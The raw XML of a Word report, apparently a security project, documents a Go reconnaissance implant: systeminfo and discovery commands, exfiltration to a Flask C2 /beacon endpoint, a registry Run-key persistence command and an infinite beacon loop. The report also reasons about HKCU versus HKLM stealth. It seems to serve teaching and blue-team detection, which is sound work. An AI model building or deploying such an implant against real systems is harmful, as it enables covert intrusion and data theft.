      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exec.Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, writes output to C:\temp\recon_combined.txt, and sends it via a single HTTP POST to the C2 server. No loop, no persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F0D10"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0DF0" w14:paraId="2C6400E5" w14:textId="77777777">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354EF10" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>net_scan.go</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — Key Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="74E42754"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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="138320FE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Key functions in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>net_scan.go</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="289574E9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08B2D0CF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>net.Interfaces</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()                              // enumerate NICs — no child process spawned</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F015796" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>exec.Command</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cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>","/C","</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>systeminfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>")         // shells to cmd.exe — visible in process tree</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0189ECCA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>os.WriteFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(path, data, 0644)                // writes recon report to C:\temp\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234DA5F3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sendToC2(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, path, hostname)                 // HTTP POST to Flask /beacon endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FC5B4DD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0EB887BC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="583BFE1A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc226583754"/>
      <w:r>
        <w:t>Version 2 — Expanded Recon (net_scan_v2.go)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="10901E3D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Adds six additional commands to the data collection section. All other functions — file write, sendToC2(), imports — are unchanged. Each command maps to a specific MITRE technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4C821"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C0DF0" w14:paraId="5CE1243F"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DE55C7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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8DB18C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>What It Reveals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="239262F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85D4D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>netstat -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ano</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039B3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Active connections with PIDs — lateral movement targets, monitoring status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="27F147F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C7161" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">net </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>localgroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> administrators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67E8A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All local and domain admin accounts — privilege escalation targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0B30395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32579" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tasklist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> csv</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1831F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Running processes in CSV format — identifies AV/EDR by process name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0B31A34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3B868" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>quser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661C6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Active sessions and idle time — OPSEC timing intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="497B5C4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2878F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>arp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -a</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73079" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ARP cache — passive subnet mapping without active scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="703CDC9C"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03D8E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">wmic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>logicaldisk</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62CAD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Disk free space — determines viability for staging large tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69E83EDC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0DC0773C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2BAAEF32" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc226583755"/>
      <w:r>
        <w:t>Version 3 — Full Payload (net_scan_v3.go)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="57A7260F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The complete operational payload. Adds registry persistence on first run and wraps all collection in an infinite 60-second beacon loop. This is the base for the obfuscation phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426BDF92"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0DF0" w14:paraId="4A302D3D" w14:textId="77777777">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3F6CC0E0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>net_scan_v3.go — Persistence and Beacon Loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="36ECD9B0"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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="35444B29" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>// Persistence — runs once at startup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1804411C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>exePath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, _ := </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>os.Executable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()          // get own path at runtime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76428125" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">reg add "HKCU\...\Run" /v </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ReconBeacon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> /t REG_SZ /d </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>exePath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> /f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70616E8F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64DB698B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>// Beacon loop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506CF49A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>for {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF0A27D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    // collect all data, write file, send to C2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7096A0D9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="3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time.Sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(60 * </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>time.Second</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DA5A662" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="376817D8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2F678A51" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="12749946" w14:textId="4672270B" w:rsidR="00A55306" w:rsidRDefault="002A677D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The choice of HKCU over HKLM is deliberate. Writing to HKEY_LOCAL_MACHINE requires administrator privileges and triggers a UAC prompt, which is both visible and logged. HKEY_CURRENT_USER requires only standard user permissions, meaning the payload achieves persistence without any privilege escalation. The trade-off is that HKCU persistence applies only to the current user account. More sophisticated mechanisms such as scheduled tasks or service installs survive user logouts and are less visible to tools like Autoruns, but both require elevated rights. For this project the Run key is the appropriate choice: it is the most widely documented persistence technique (T1547.001), it generates a demonstrable Sysmon EID 13 event for the blue team analysis, and it illustrates the core attacker trade-off between stealth and privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134436DB" w14:textId="77777777" w:rsidR="00A55306" w:rsidRDefault="00A55306"/>
    <w:p w14:paraId="2C49E9DB" w14:textId="1A40E3DC" w:rsidR="00A55306" w:rsidRDefault="00A55306">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B4BC4C" wp14:editId="3FFAF975">
            <wp:extent cx="5724525" cy="1228725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="121449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1228725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32321EE4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc226583756"/>
      <w:r>
        <w:t>4.3  C2 Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="47D7E605" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The C2 server is a minimal Flask application that listens for POST requests on port 5000. Each incoming beacon is saved to an uploads/ folder with a unique filename constructed from the host ID and a UTC timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A03BD0"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0DF0" w14:paraId="0F2FFC5F" w14:textId="77777777">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5E2366EA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>c2_upload.py — /beacon Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="26C5DF18"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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3EF1886D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>@app.route("/beacon", methods=["POST"])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530B951D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>def beacon():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E64595D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
